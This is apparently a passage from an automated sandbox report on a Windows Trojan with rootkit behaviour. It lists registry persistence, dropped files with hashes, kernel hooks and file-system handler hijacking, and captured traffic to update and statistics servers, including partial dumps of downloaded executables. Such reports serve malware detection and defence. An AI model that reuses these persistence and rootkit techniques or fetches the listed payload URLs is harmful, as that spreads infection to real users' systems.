"(Default)" = "{7605CC7C-00FD-4A5F-BAFD-828342DE6279}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Flags" = "1"

[HKLM\System\CurrentControlSet\Services\cnprov]
"DisplayName" = "cnprov"

"ErrorControl" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 F6 9D 75 AB 13 28 BB D4 5B 87 F2 8A 73 1A 6D"

[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0\HELPDIR]
"(Default)" = "C:\PROGRA~1\OCINS\"

[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\TypeLib]
"(Default)" = "{7605CC7B-00FD-4A5F-BAFD-828342DE6279}"

[HKLM\System\CurrentControlSet\Services\cnprov]
"Type" = "1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"Icon" = "%Program Files%\OCINS\config.exe,216"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Version" = "*"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\ProgID]
"(Default)" = "IEAux.IEHlprObj.1"

[HKCR\IEAux.IEHlprObj]
"(Default)" = "IEAux Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch" = "http://client.jogo.cn/cdn/browser/customsearch/customsearch-en.html"
"SearchAssistant" = "http://client.jogo.cn/cdn/browser/sidesearch/sidesearch-en.html"

The following driver will be automatically launched by the OS Loader:

[HKLM\System\CurrentControlSet\Services\cnprov]
"Start" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IdnSvr" = "%Program Files%\OCINS\idnsvr.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\cnprov]
"InstallPath"
"DeleteFlag"

"SystemRoot"

[HKCU\Console]
"KwUnSelf"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"uninsrest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"renewup"

"ExFilter"

The process setup.exe:3264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 62 4C 73 7C 66 E1 4B 61 7E 2D 32 FB 5D 52 AA"

The process %original file name%.exe:1712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 42 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"soft256.exe" = "soft256"

"cnnic_1009.exe" = "cnnic_1009"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process idnsvr.exe:4052 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 04 AB 01 43 81 A1 56 B7 94 93 23 C0 0F C3 E8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

The Trojan deletes the following value(s) in system registry:

[HKCU\Console]
"KwUnSelf"

Dropped PE files

MD5 File path
9f230f967a8607b7565cfcb83d963a96 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cndsv.dll
b06090ee2881c1bac0d275b17d140d3b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cnprov.sys
3d8a11f1dc9127afc415a3c5aa0f4ab8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cnprovh.dll
bc69dffa76af3297b653bfc814f7b87f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\config.exe
57b46fc2b9cb59275cdcfb5e1722f48f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\convs.dll
135ab6cf712cd9fc4b5cd55d71e781c0 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnreg.dll
70019002fdac4580e81d7ff75fb598db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnsvr.dll
2312b02cf8c50bc32cdb0686a9c3ac96 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnsvr.exe
59edc983e52851d195e7c61e8efad602 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\ieaux.dll
c8d32d9ce600888693ccb1864bf6bdd2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\loader.exe
088efc555a77d8d35a9ff367ca48d86f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\setup.dll
a4bf929fdcb401b8cfd9fd212686907e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\setup.exe
5af44e42174649b95758b0e5ef79adf6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\uninstall.exe
6401dc5833d65f4d95bd6e8f78fdf8a1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\cnnic_1009.exe
f2324a0a589478957b66b967c8d95d8c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\m4.exe
3872b1238b8e6c1b92c20e63b6560009 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\soft256.exe
f2324a0a589478957b66b967c8d95d8c c:\MP3\svchost.exe
0a96acb043f1c72e088a46358bb1b5a3 c:\Program Files\OCINS\austr.dll
9f230f967a8607b7565cfcb83d963a96 c:\Program Files\OCINS\cndsv.dll
3d8a11f1dc9127afc415a3c5aa0f4ab8 c:\Program Files\OCINS\cnprovh.dll
bc69dffa76af3297b653bfc814f7b87f c:\Program Files\OCINS\config.exe
57b46fc2b9cb59275cdcfb5e1722f48f c:\Program Files\OCINS\convs.dll
70019002fdac4580e81d7ff75fb598db c:\Program Files\OCINS\idnsvr.dll
2312b02cf8c50bc32cdb0686a9c3ac96 c:\Program Files\OCINS\idnsvr.exe
05cc443897f1b818b45ee0678c9e506f c:\Program Files\OCINS\ieaux.dll
764abdae9880ab1c3ea725a9bb62b784 c:\Program Files\OCINS\uninstall.exe
0a96acb043f1c72e088a46358bb1b5a3 c:\Program Files\OCINS\update\austr.dll
f6a405cded18319b910822cfceb03af7 c:\Program Files\OCINS\update\update.exe
041f9424d638ddc0ff8f21d44ded7c72 c:\WINDOWS\system32\drivers\cnprov.sys
d5bb1996768ed9f61915be739a1fcc43 c:\WINDOWS\system32\setup.exe.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\drivers\cnprov.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\drivers\cnprov.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "%System%\drivers\cnprov.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
The Trojan installs the following kernel-mode hooks:

ZwClose
ZwCreateKey
ZwCreateThread
ZwDeleteKey
ZwDeleteValueKey
ZwEnumerateValueKey
ZwOpenKey
ZwQueryValueKey
ZwReplaceKey
ZwRestoreKey
ZwSetSecurityObject
ZwSetSystemInformation
ZwSetValueKey

Using the driver "%System%\drivers\cnprov.sys" the Trojan substitutes IRP handlers in a file system driver (NTFS) to control operations with files:

MJ_CREATE
MJ_CLOSE
MJ_READ
MJ_WRITE
MJ_SET_INFORMATION

Using the driver "%System%\drivers\idnaux.sys" the Trojan substitutes IRP handlers to control devices of tcpip.sys driver:

MJ_CLOSE
MJ_DEVICE_CONTROL
MJ_INTERNAL_DEVICE_CONTROL

Using the driver "%System%\drivers\cnprov.sys" the Trojan substitutes IRP handlers in a file system driver (FastFAT) to control operations with files:

MJ_CREATE
MJ_CLOSE
MJ_READ
MJ_WRITE
MJ_SET_INFORMATION

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 114688 35840 5.5358 5b547387783d91b4b3e6beaaea639923
.rsrc 118784 12288 9728 4.02815 11196967b6fe974fa5d94b67be64252e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://update.jogo.cn/cdnClient/update/v26_p/version.dat
hxxp://update.jogo.cn/cdnClient/update/v26_p/data2.cab
hxxp://50.117.116.117/down/wxpSetup256.txt
hxxp://jump.knet.cn/stat/stat
hxxp://jump.knet.cn/stat/first
hxxp://50.117.120.254/down/wxpSetup256.txt
hxxp://update.jogo.cn/cdnClient/update/v26_p/update.exe
hxxp://www5.softuu.cn/down/wxpSetup256.txt 50.117.116.117
update.cnnic.cn 202.173.11.10
jump.cnnic.cn 202.173.11.132


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /stat/first HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 53

sid=1001&pid=0000&sw=C_gr294&sp=002.006.000.000&drv=1
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Wed, 16 Apr 2014 08:33:48 GMT



POST /stat/stat HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 183

sid=0102&pid=C_gr294&sp=002.006.000.000&cid=aaamcjdlnpcpaaamcjdlnpcpdadadadadadadadadadadadadadadadadadadadbmdilgeogeapgmjlebcngahefeaommfomlhgempgjljdpjaggoogjhoifimlgpjhb0003&bind=0
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1806
Date: Wed, 16 Apr 2014 08:33:48 GMT
Connection: close
<html><head><title>Apache Tomcat/7.0.22 - Error repo
rt</title><style><!--H1 {font-family:Tahoma,Arial,sans-
serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-f
amily:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;fon
t-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;back
ground-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,s
ans-serif;color:black;background-color:white;} B {font-family:Tahoma,A
rial,sans-serif;color:white;background-color:#525D76;} P {font-family:
Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A
 {color : black;}A.name {color : black;}HR {color : #525D76;}--><
;/style> </head><body><h1>HTTP Status 500 - </
h1><HR size="1" noshade="noshade"><p><b>type</
b> Exception report</p><p><b>message</b> &l
t;u></u></p><p><b>description</b> <
;u>The server encountered an internal error () that prevented it fr
om fulfilling this request.</u></p><p><b>excep
tion</b> <pre>java.io.FileNotFoundException: /home/knet/st
at/cfg/url.properties (No such file or directory)..java.io.FileInputSt
ream.open(Native Method)..java.io.FileInputStream.<init>(FileInp
utStream.java:120)..java.io.FileInputStream.<init>(FileInputStre
am.java:79)..java.io.FileReader.<init>(FileReader.java:41)..net.
knowledgeservice.pub.util.FileUtil.fileToArray(FileUtil.java:103).
<<< skipped >>>


GET /cdnClient/update/v26_p/data2.cab HTTP/1.1
Host: update.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache



.c......PKU..4.$.j.........d......t..E..o.../..mG. .B....._Y..A.....k.
A..G.,....9.|......-..I.j.o=.}.I.NZ.~....Y]..4}w..Z.1}Y.9 97.p..;=. r.
.,..R..].('u...38MK..X^].L...$d..v5..5g.'.Zs....Ok...!..~\...fV>^%W
...jf....'. ..j...j..&..-j.7j.d.Q.&...j...^M...jr.1MM..W..].{.\.P....B
e..t...d.Q.&..AM...d...9..'#]............B=.#...z..$.......,......F...
]...0.....$.....|.............WJ.?..Am.9.BH....BH.........B(......g.|8
%.x.)~N..............u...c..S..R....!.5..f.O......}..<b..WcR.s.Q.vK
.Y...p..c....U.rc.2..1...E./.......$ ..f....j./....0....8.....0U..h...
....c.X.K.i2.Q..4a,.&.%.5.I...G....o....%..C..p i>....Y-.m8.Z>8.
8....P4Q.E..j.w!.D.|.*.....E..Q..]^.](v.....^.N...2D...K....([email protected]
...>..e.ZX. .....#._2.....Ut.....9.b/E.......6.zD..:.,....j.E...br.
.9~JQ|.ex.. ..49..F.F,.r.)...1a)t..C..'`.eA.H.{)Pg.0.....Z.A}..y$.....
x.f:}YZ.P.2.d...>[email protected]}...........XHm>mk\...S~...i.l....C..
....4R..i...Kd.l..2c...#Z0.v./.....(.......1...,. `.=h.2d.N.5.|.......
..F..N..........s.3........:.j.....\.H8..M.....ky.......x"......;.!gU.
*...oVNA.z.0E....{.a..k..~gwn..l.......r{k/.=$<&\...~.....Y...E...2
....\O..u<).K.."[.yLn..-O.......R..d.....~... .).....ZZ.'u!.J.S..Z.
.[.....-/S..W.........t........B./.f-......!:...8|.g...w.#.....*....F.
.Y.N.K...7...2.v.T..9F....].<c2.se}F.$.3/....`X...-D$....t>=...I
U\.%...O........N..-zq.u.9....vnv......i...iI..`..6F.X>A;......f.S.
..|....P9e.I......d.....|.V..z^b8..y..z62,.D.....p..35Ud<..D.!5Ul..
.J.{....KMIF..*[email protected]..).HTTP/1.1 200 OK..Date: Wed, 16 Apr 20
<<< skipped >>>


GET /cdnClient/update/v26_p/version.dat HTTP/1.1
Host: update.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 16 Apr 2014 08:33:46 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 08:54:32 GMT
ETag: "292a0e9-1e2-48b7d5e0e2200"
Accept-Ranges: bytes
Content-Length: 482
Connection: close
Content-Type: text/plain; charset=UTF-8
[version]..ver=2.6.0.42..[update]..url=hXXp://update.cnnic.cn/cdnClien
t/update/v26_p/version.dat..[stat]..stat=hXXp://jump.cnnic.cn/stat/sta
t..live=hXXp://jump.cnnic.cn/stat/first..uninstall=hXXp://jump.cnnic.c
n/stat/uninstall..[exe]..version=2.6.0.12..url=hXXp://update.cnnic.cn/
cdnClient/update/v26_p/update.exe..[cab]..version=2.6.0.32..url=http:/
/update.cnnic.cn/cdnClient/update/v26_p/data.cab..[relay]..url=hXXp://
update.cnnic.cn/cdnClient/update/v26_p/data2.cab..



GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www2.softuu.cn
Connection: Keep-Alive
Cookie: PHPSESSID=hpu1peah8f6ekmonnpelhl7k24


HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:30 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224.............Z[o.Hv. 5l.e.)....ey!K.[m[v[..` PdQ,.7.E]..H...`..d..
....y.Kv. .6.v~.\v.ENU..lw{:....c.R.Xu......j...Q...x...u..>..>%
.r(...M..6.b/[email protected]...[.........O....O6z.Y.
...p(..=X..us{..T.N. .oc2iJm......y.%C<4%[email protected]
>.C3Z....E.?.._7..Y..!...a..b..yH.H>.Ji...q...Tx@........[Q.b..]
....G...3y.Q...bb4.c4%.F..R..X......CWg.P..6...?p.lt.c.....].3...,Xa.-
........C......J#..&..V(L...ZT....._Gy&...n3.-..y.{..F.^....V).. .\...
....(..J...Tvv*j.%..|.N.....d:1J.......9_...f .sx.F.9.M2.MG6.l.r...#;D
.U...vI...].....X6|....2..1.0.....d..1......r ......}.ej....P.........
....$*[email protected]?.d.{....9..o..O.....1.4....I.1.F.[.B..
 .;d.i.l....\`.......=g..........b0k.GKw.3..Cb.>...._c"..._..O...w.
..w....8 . .X..>......VHt...0...l5.....T*5.?"l.Z.....7......"H..pH.
.a".<....gM<...)0A....L0c..$ u.i:..X..S.x)..5A....6......M1..T[.
..<HP.-2.t........6[!.6.....$..}.!...c(.d'...f.[{.....C(..a-.......
.h...".....:^.J].....r.'.3.0....'....f......Z.....I.1..t(.h...(!.9...g
.\...$...h....pV/...o8.F.q......E.!%.BW..7"w..qm.R.LK.R....8?&..E!....
a....bJLjk.*...c......pV.*......../'...@".Am5.\.cE.W.Z.k4........"....
.....x(2f......N.....b*.T.hk.Kf.^...IE...t. ..?E%.;.@ko6.%6..>...L.
E.CL....O.%@H.0j0'.-.Hr.)...B)..b.....R..*l.......#$.-...X..RJ'..a....
"..w.d......fD..jc....3.96.y..}....a..t(....1...s......8(WR..v..P...,.
.J*Y...zQo..z.....W.7..K..W....I...B.K..$.T..KH0...TtB..&.[.qi>...P
.K......./X...\..S6(...]...P.*!T..A.T.Y.m..3c...bK%z.M.:*h.M05....
<<< skipped >>>


GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www3.softuu.cn
Connection: Keep-Alive
Cookie: PHPSESSID=qekkaf4qlu6hc6dmgbnt9onfp1


HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:27 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224.............Z[o.Hv. .6....D....B.,.....|[email protected]&..X1.....b'.>
;........."@.l.........SU.$.mwg0..`l@,..NU....Um~.9l.\...6q....d.sl...
z;BU.bK........)bT......gb..Y^.H.?h]}.u..?h]{.u.q....7.l..._~.....(...
C....2l..[..":p..2....).}. ..'.....i...H...!...F.4cb.0.N..]....|..f...
s.#...s|..vf...(...I..!...........p.G.t...H.(2B...{ .S.............4EB
...l"a.....[pA.\.......Y~.......-.l..8Q:........\.3..@.`.9....s...C.."
[...V.q.4.D.|~:......U.=.*.Q...t..o.8...K.0..b.U(..r....R..#oW;..S..[U
e{..._.P...T.*H.H..#.8h..O...e3.k6#2....7...'..H&.LS...w$.K.*....JvI..
.]...I.o"..Y..;&.Fr..6... &...."]......7.O.Dl....J.......`.A...D%.....
(...A..c....w([email protected].>."d..t.../\=.cOS..n...Ci..E!...d..cO3`.
......^.}p.E..K..l.9..HS....^-...\.....TP....aQ.....?.................
......?...Z!......?.a..._...b.......B...&.q'..A. .T(..G0.*2..=.....g.R
4.&(.r...D..;.J]l.........^Jb}M..F!&..x...uS..6...wB.$....i...].Wm....
.i.M..rM...>....{c(..N.C..N^{.........a-........h...".....:V.J...D.
.2.'.3.0.....).hK...s.....108...c.%.P...._..8..=&>m.... Q&~...@....
@.....7..k.o...P..b.)t5gz#|k.... ....(..9..scl.Y!D...#....]L.Il.^a..s.
..l.i.c....0[ ..\......HD...f*'8V.z......6&.c..`...O......{x(Pfq.....N
..t..|*.T.hk.Kf%.((.?..4.... ....d.p..}...t"\}p..05!..l./...o.........
|....b....P.`...p......2./a..(.A..vK..1.6*...GC...i..].VN......gF..\m.
7.px.3..3.A.....!......s.7. {...,....G..J....$..(.....J...'...........
'.o../..]}.Rn$u\.r..i...RY./[email protected].,E\Rk., .`..|r..N...
.^t._:C...P...eR.fy.}.....^.[*.Stb.Q..t..A.?.....K....O.PR..(".#.Q
<<< skipped >>>


GET /cdnClient/update/v26_p/update.exe HTTP/1.1
Host: update.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 16 Apr 2014 08:33:51 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 09:00:08 GMT
ETag: "292a0e8-6bc80-48b7d72151600"
Accept-Ranges: bytes
Content-Length: 441472
Connection: close
Content-Type: application/octet-stream
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......u........=.u
N.:.h........&.../....p....`.Q..6D..(N......{.".D......S.4.(....o..x..
[email protected]..............
.`[email protected].............................
..........................................T...........................
.............................................................text....P
.......*[email protected].......`.......0..............@...
[email protected].........................
[email protected].. [email protected]..............
................@.....................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www5.softuu.cn
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:57 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Set-Cookie: PHPSESSID=l0471imf8i68j3bo1abkea0tm3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224.............Z[o.Hv. .6....D....B.,.....|[email protected]&..X1.....b'.>
;........."@.l.........SU.$.mwg0..`l@,..NU....Um~.9l.\...6q....d.sl...
z;BU.bK........)bT......gb..Y^.H.?h]}.u..?h]{.u.q....7.l..._~.....(...
C....2l..[..":p..2....).}. ..'.....i...H...!...F.4cb.0.N..]....|..f...
s.#...s|..vf...(...I..!...........p.G.t...H.(2B...{ .S.............4EB
...l"a.....[pA.\.......Y~.......-.l..8Q:........\.3..@.`.9....s...C.."
[...V.q.4.D.|~:......U.=.*.Q...t..o.8...K.0..b.U(..r....R..#oW;..S..[U
e{..._.P...T.*H.H..#.8h..O...e3.k6#2....7...'..H&.LS...w$.K.*....JvI..
.]...I.o"..Y..;&.Fr..6... &...."]......7.O.Dl....J.......`.A...D%.....
(...A..c....w([email protected].>."d..t.../\=.cOS..n...Ci..E!...d..cO3`.
......^.}p.E..K..l.9..HS....^-...\.....TP....aQ.....?.................
......?...Z!......?.a..._...b.......B...&.q'..A. .T(..G0.*2..=.....g.R
4.&(.r...D..;.J]l.........^Jb}M..F!&..x...uS..6...wB.$....i...].Wm....
.i.M..rM...>....{c(..N.C..N^{.........a-........h...".....:V.J...D.
.2.'.3.0.....).hK...s.....108...c.%.P...._..8..=&>m.... Q&~...@....
@.....7..k.o...P..b.)t5gz#|k.... ....(..9..scl.Y!D...#....]L.Il.^a..s.
..l.i.c....0[ ..\......HD...f*'8V.z......6&.c..`...O......{x(Pfq.....N
..t..|*.T.hk.Kf%.((.?..4.... ....d.p..}...t"\}p..05!..l./...o.........
|....b....P.`...p......2./a..(.A..vK..1.6*...GC...i..].VN......gF..\m.
7.px.3..3.A.....!......s.7. {...,....G..J....$..(.....J...'...........
'.o../..]}.Rn$u\.r..i...RY./[email protected].,E\Rk., .`..|r..N...
.^t._:C...P...eR.fy.}.....^.[*.Stb.Q..t..A.?.....K....O.PR..(".#.Q
<<< skipped >>>


GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www4.softuu.cn
Connection: Keep-Alive
Cookie: PHPSESSID=kc4506f6moav0eu2hecipfahm4


HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:46 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224.............Z[o.Hv. 5l.e.)....ey!K.[m[v[..` PdQ,.7.E]..H...`..d..
....y.Kv. .6.v~.\v.ENU..lw{:....c.b.Xu......j...Q...x...u..>..>%
.r([email protected]...[.........O....O6z.Y.
...p(..=X..us{..T.N. .oc2iJm......y.%C.4%[email protected]>
;.C3Z....E.?.._7..Y..!...a..b..yH.H>.Ji...q...Tx@........[Q.b..]...
.G...3y.Q...bb4.c4%.F..R..X......CWg.P..6...?p.lt.c.....].3...,Xa.-...
.....C......J#..&..V(L...ZT....._Gy&...n3.-..y.{..F.^....V).. .\......
.(..J...Tvv*j.%..|.N.....d:1J.......9_...f .s..F.9.M2.MG6.l.r...#;D.U.
..vI...].....X6|....2..1.0.....d..1......r ......}.ej....P............
.$*[email protected].=.......X....a.7f.'.x....x...t.$..J#.-.......
2.4.......0.....[...da...E..kj1.5......k.!1B...]..1.d../...?..._.....[
x..w.{..w......B $...z..S.....E{Q*.......-..Hh......R...BY8$..0.i.....
.&..K... ....&.1Vw....4.FQ,...C........CB...t......m.-k.Q.$....i...].W
m.S...k.M..rM...>..G..1.....Pd....OHDF.!.......Z.LL..4..X.U.lnI./C.
.Dkb..9....q...Q.....R.}..Bpu.C.......lI:.C.X.......c..f.U...s..4...&g
t;8..l../.p#..a..L......M..y...;.....)..%E)...h...K....X..0...w1%&..z.
cC.1....Lk8.D.......r....QB .....i......F-.5...r....V..O..B....<...
..S.yL..}z..1.D*..5.%.B/...OE...t. ..?E%.;.@k_6.%6..>...L.E.CL.....
.J..6`.`N.[$...S../.R.....#=\.h.U.x..UE..FH.[.5...Q..N>....N.E...r.
.a.R....4$..z...g>sl<............P.1.xc........0.qP.........E.X.
